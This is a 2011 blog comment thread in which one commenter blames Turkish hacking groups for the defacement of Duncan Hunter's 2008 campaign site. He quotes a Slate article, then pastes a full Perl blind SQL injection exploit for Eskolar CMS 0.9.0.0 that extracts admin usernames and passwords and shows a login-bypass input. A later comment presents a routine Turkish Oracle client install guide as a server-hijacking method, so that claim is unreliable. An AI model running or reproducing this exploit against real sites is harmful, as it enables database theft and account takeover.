Trackbacks

• Trackbacks are closed for this post.

Comments

• 3/23/2011 6:36 AM Defendourfreedoms wrote:
  Primaries are over. Why is this relevant? Because the Turk-H, TurkHackTeam are connected to all the data dumps and hacks still occuring on the Net today. When looking into the now, never forget the past.
  
  
  http://wwwslatecom/blogs/blogs/trailhead/archive/2008/01/17/exclusive-duncan-hunter-gets-hacked.aspx
  Exclusive! Duncan Hunter Gets Hacked
  Posted Thursday, January 17, 2008 6:00 PM | By Chadwick Matlin
  In a rare occurrence, I visited Duncan Hunter's Web site today to see if it still hadn't been updated in months. Surprisingly, it had. By a hacker.
  
  In the scrolling news marquee, a team of hackers who go by the handles clientcode, undertaker, and theghost left a message for all of Hunter's American fans: "Kiss You Babyyy yeahhh (:"
  
  Is that the best they couldcome up with? How about, "Duncan Hunter is a one-delegate farce," "Duncan Hunter supports an Iraq war that's killed hundreds of thousands of people," or "Duncan Hunter, you're a God-fearing slimeball. Drop out of the race." If you're going to hack the man's site, at least do it with a little panache.
  
  This isn't the first time Hunter's site has been hacked, according to campaign manager Roy Tyler. He told me that a few days ago, Turkish hackers got into the site and left a message in Arabic that blasted Hunter for his pro-Iraq record. It was also hacked about a year ago. Tyler said the campaign expected to be a hacker target, so they took extra security precautions, but to no avail. When I called, Tyler said the campaign was unaware of the latest hack, but I later found out his tech team was already on it, and it was fixed it a few minutes later.
  
  Trailhead found people on the Internet bragging about the hack that occurred earlier this week. A hacker congregation site, Turk-h.org, seems to suggest that someone going by "ayyildiz" attacked the site because of "politik sebepler" or "political causes" (according to a Turkish-English translation done by a friend) . But it looks like different hackers (clientcode, undertaker, and theghost) got into the site this time. If my very uneducated assumptions are correct, it looks like ayyildiz is a prolific hacker, defacing over a thousand sites according to his profile on turk-h.org. The names "clientcode" and "undertaker" also appear frequently on various hacker forums.
  
  But of all the sites on the Internet, ayyildiz picked Hunter's to defame. He now joins the illustrious ranks of topsexxxlinkscom and turtle-pictures.de. But look on the brightside, at least somebody somebody cares about Hunter's political beliefs.
  
  With Chris Wilson.
  
  Filed under: Duncan Hunter
  
  Reply to this
• 3/23/2011 6:48 AM Defendourfreedoms wrote:
  These sites being hacked aren't just leaving cute pictures and messages on the Index pages. They are cracking the database and downloading them. The pictures and messages are just to let you know they were there, like a gang tag. If they don't leave the gang tag, then you will never know your database was downloaded.
  
  http://www turkhackteam .org/eskolar-cms-0-9-0-0- remote-blind-sql-injection-exploit -t3963.html?s=f2559d37ab0bda0567557e1ade83c6de&t=3963
  
  
  This is the Insert SQL that was used Please note, the worm that was inputted to the database contains access for future use . What I read from the email from ElectionMall's lack of responsibility for leaving the database vulnerable, that they only reloaded the HTML splash pages and did absolutely nothing to secure the database. 
  
  
  #===#!/usr/bin/perluse IO::Socket;#====================================== ================================================== ==========#======================================= =======================================## Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com ##================================================ ==============================##================== ================================================== ==============================#Title: Eskolar CMS 0.9.0.0 Blind SQL Injection Exploit and bypass admin logon vulnerability #Application: Eskolar CMS#Version: 0.9.0.0#Url: [Only Registered Users Can See Links]================================================= =================================================# ================================================== ================================================#A ffected software description:#Not properly sanitized input can be used to inject crafted SQL queries and cause#the database server to generate an invalid SQL query. We can use Blind SQL Injection attack#to determine username and password for CMS and also classical SQL Injection#to bypass admin logon. Password for CMS is storing in database as clear text!#There is using addslashes() function to filtration GET variables, but we can prepare#SQL query without slashes in Blind attack . There is not addslashes() function to filtration#variables using to log in, so we can use classical SQL Injection to log in as admin .#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php#====================================== ================================================== ==========#======================================= ================================================== =========#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)#if (isset ($_GET['gr_1_id'])) {# $gr_1_id = (get_magic_quotes_gpc()) ? $_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);#}#if (isset ($_GET['gr_2_id'])) {# $gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);#}#if (isset ($_GET['gr_3_id'])) {# $gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);#}#if (isset ($_GET['doc_id'])) {# $doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);#}#...#index.php - line 202#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";#etc.#...#======================================= ================================================== =========#======================================== ================================================== ========# Bypass admin logon :#Vulnerable code: (php/esa.php - lines 27-35)#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];#//$prefix="esa";#$enter = 0;#$_SESSION['uid'] = $uid;#$_SESSION['pwd'] = $pwd;# mysql_select_db($database _bkb, $bkb);#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";## If magic_quotes_gpc = Off attacker can log in as admin using classical SQL Injection attack.## Eg: USER: j4ck' or 1=1/*## PSW: *blank*#========================================== ================================================== =======#PoC Exploit:if ((@ARGV lt 2) or (@ARGV gt 3)) { &usage; }sub usage(){ print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n"; print "- Exploit for Eskolar CMS 0.9.0.0\r\n\r\n"; print "- Usage: $0 <target> <target directory>\r\n"; print "- <target> -> Victim's target eg: [Only Registered Users Can See Links]"; print "- <target directory> -> Path to index.php eg: /eskolar/\r\n"; print "- Eg: [Only Registered Users Can See Links] /esa/\r\n\r\n"; exit();}$HOST = $ARGV[0];$DIR = $ARGV[1];$prefixDB = $ARGV[2];if (@ARGV eq 2) { $prefixDB = "esa"; } print "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";$HOST =~ s/([Only Registered Users Can See Links])//;#$positive = "?doc_id=999%20or%201=1--";#$negative = "?doc_id=999%20or%201=0--"; @ARR = ("user","password"); print "Connecting ...\r\n";sleep(1);TOP:for ($k=0;$k<=$#ARR;$k++) { $j=1; $i = 32; $string=''; $res=''; while() { $l=0; for ($i=32;$i<=127;$i++) { $val = "?doc_id=99999"; $val .= "/**/or/**/1=1"; $val .= "/**/and/**/ascii(substring("; $val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)"; $val .= ",$j,1))/**/=/**/$i"; $data="$DIR$val"; $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error - connection failed!\r\n\r\n"; print $req "GET $data [Only Registered Users Can See Links]"; print $req "Host: $HOST\r\n"; print $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n"; print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n"; print $req "Accept-Encoding: gzip,deflate\r\n"; print $req "Keep-Alive: 300\r\n"; print $req "Connection: Keep-Alive\r\n"; print $req "Cache-Control: no-cache\r\n"; print $req "Connection: close\r\n\r\n"; while ($ans = <$req> { if ($ans =~ /404/ ) { print f "\n\nFile not found.\r\n\r\n"; exit; } if ($ans =~ /400/ ) { print f "\n\nBad request.\r\n\r\n"; exit; } if ($ans =~ /ORDER BY sorted ASC/) { $string .= chr($i); if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2)) { $res .= chr($i-1); $l=1; } last; } } if ($l eq 1) { print "Found: ".chr($i-1)."\r\n"; sleep(1); last; } if ($i eq 127) { print "$ARR[$k] found: $res\r\n"; $ARR[$k] = $res; if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne ''))) { print "\r\n\r\n\r\n-------------------- Username => $ARR[0]"; print " Password => $ARR[1] -----------------------\r\n"; } elsif (($ARR[0] eq '') and ($ARR[1] eq '')) { print "Nothing found ..."; } if ($k eq 0) { sleep(1); print "\nTrying Password\r\n"; sleep(1); } sleep(1); next TOP; } print "\t\t\t\tTrying: ".chr($i)."\r\n"; } $string = ''; $j++; } }#================================================ ================================================== ======# milw0rm.com
  
  So who was printing Duncan Hunter's databases and what happened to all of the people's information that assisted with that primary campaign?  Yes, the primaries are over, but the hacking, stalking and harrassing is not.  This is also a working model for all the cracks, hacks and stalking that have happened to websites since.  I just happen to have all of this data to work with.
  
  
  Reply to this
• 3/23/2011 7:15 AM Defendourfreedoms wrote:
  The Turk-H, TurkHackTeams, Anonymous, Chaoscomputer Group affiliates, #HQ et al, remap the Oracle servers at the root. This allows them to download databases from the servers. Who is downloading your data and where is it going? You only know if one of their script kiddies tags your Index file. Otherwise, you don't know they reconfigured your server for their own access.
  
  kdesu kwrite /etc/sysctl.conf
  
  

  /etc/sysctl.conf dosyasının en sonuna aşağıdaki satırları ekleyiniz:

  # Oracle 10g parameters
  kernel.shmall = 2097152
  kernel.shmmax = 2147483648
  kernel.shmmni = 4096
  kernel.sem = 250 32000 100 128
  fs.file-max = 65536
  net.ipv4.ip_local_port_range = 1024 65000
  net.core.rmem_default=4194304
  net.core.wmem_default=262144
  net.core.rmem_max=4194304
  net.core.wmem_max=262144
  
  

  Yukarıdaki dosyada yaptığımız değişiklikleri uygulamak için konsolda bu komutu çalıştırın:

  # /sbin/sysctl -p
  
  Oracle değişkenleri
  

  Tekrar Alt + F2 tuşuna basarak aşağıdaki komutu çalıştırın:

  kdesu kwrite /home/oracle/.bash_profile
  
  

  Bu dosyaya aşağıdaki satırları ekleyiniz.

  ORACLE_BASE=/home/oracle/oracle
  ORACLE_HOME=$ORACLE_BASE/product/10.2.0/client_1
  ORACLE_SID=orcl
  LD_LIBRARY_PATH=$ORACLE_HOME/lib
  PATH=$PATH:$ORACLE_HOME/bin
  export ORACLE_BASE ORACLE_HOME ORACLE_SID LD_LIBRARY_PATH PATH
  
  

  Bu dosyayı kaydedip aşağıdaki komutları konsolda çalıştırın.

  cd /home/oracle
  . .bash_profile
  
  Oracle Client İndirmek
  

  Oracle’ın sitesinden 10201_client_linux32.zip dosyasını indirin (Eğer elinizde yoksa, bu 10g için şu an 11g’de var) Dosyayı indirdikten sonra /home/oracle dizinin altına "orakur" adlı bir dizin açıp buraya kopyalayıp burada açın. Şimdi "orakur" klasörünün içinde "install" klasörünün içinde "oraparam.ini" adında bir dosya var bu dosyayı "kwrite" ile açıp

  SILENT_VARIABLE_VALIDATION=TRUE
  
  [Certified Versions]
  Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2
  
  [UnitedLinux-1.0-optional]
  TEMP_SPACE=80
  SWAP_SPACE=150
  MIN_DISPLAY_COLORS=256
  
  

  bu satırı bulup

  [Certified Versions]
  Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2
  
  

  satırını tamamen silip kaydedin.

  
  Gerekli paketler
  

  Konsolda aşağıdaki komutları sırası ile çalıştırın:

  # sudo pisi it libaio
  # sudo pisi it unixodbc
  
  

  Artık kuruluma hazırız.

  
  Kurulum
  Kurulum
  

  Temiz bir konsol açıp

  "su oracle"
  
  

  ile "oracle" kullanıcısına geçin ve aşağıdaki komutları sırası ile girin

  # cd /home/oracle/orakur/client
  # LC_ALL=C
  # ./runInstaller
  
  

  Burada LC_ALL=C komutu dil ayarları ile ilgili aksi halde kurulum son aşamada hata veriyor. Kurulumdaki bütün yönergeleri takip edin. Kurulumun varsayılan yolunu değişirseniz üçüncü adımdaki parametreyi değişmeniz gerekir. Karşınıza "Network Configuration Assistant" çıkacak. "Perform Typical" olarak ayarlayıp bu kısmı da bitirin. En son size bazı dosyaları çalıştırmanızı söyleyecek, bu ekranı kapatmadan bir konsol penceresi açıp color=#0000ffroot olarak girin ve sırasıyla şu komutları çalıştırın:

  # cd /home/oracle/oraInventory
  # ./orainstRoot.sh
  #
  #
  # cd /home/oracle/oracle/product/10.2.0/client_1
  # ./root.sh (cevap bekleyen sorulara "ENTER" ile direk cevap verin)
  
  

  Artık kurulum bitti 

  
  Çalıştırma
  Console’u çalıştırma
  

  Konsoldan çalıştırmadan önce mutlaka

  LC_ALL=C
  
  

  Komutu verilmeli.

  Aşağıdaki satırları;

  LC_ALL=C
  /home/oracle/oracle/product/10.2.0/client_1/bin/oemapp console
  --------------------------------------------------------------------------------------------
  
  
  Reply to this

Leave a comment